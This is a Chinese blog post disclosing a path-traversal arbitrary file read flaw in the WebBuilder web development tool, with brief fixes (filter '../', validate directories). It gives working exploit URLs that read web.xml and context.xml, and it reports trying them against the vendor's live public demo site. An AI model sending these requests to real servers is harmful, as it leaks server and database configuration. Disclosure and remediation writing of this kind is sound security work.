开源Web应用开发工具WebBuilder任意文件读取及修复

开源Web应用开发工具WebBuilder存在任意文件读取漏洞，可泄露服务器及数据库配置等关键信息。

开源Web应用开发工具WebBuilder任意文件读取及修复插图

查看数据库，调用此方法的xwl不需要登录验证，没有获取权限的情况下也可以访问：

开源Web应用开发工具WebBuilder任意文件读取及修复插图1

开源Web应用开发工具WebBuilder任意文件读取及修复插图2

于是，访问这个URL：

代码读取文件的的路径，是webbuilder/docs/，先尝试访问该文件夹下文件：

http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@index.txt

开源Web应用开发工具WebBuilder任意文件读取及修复插图3

修改dir参数，没有过滤../，比如提交web.xml路径：

http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml

开源Web应用开发工具WebBuilder任意文件读取及修复插图4

再试一个：

http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../META-INF/context.xml

开源Web应用开发工具WebBuilder任意文件读取及修复插图5

在WebBuilder官方的在线使用站上测试一下：

http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml

开源Web应用开发工具WebBuilder任意文件读取及修复插图6

http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@../../META-INF/context.xml

开源Web应用开发工具WebBuilder任意文件读取及修复插图7

1.过滤../。

2.读取文件时，对目录进行检验。

本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了，原文地址《开源Web应用开发工具WebBuilder任意文件读取及修复》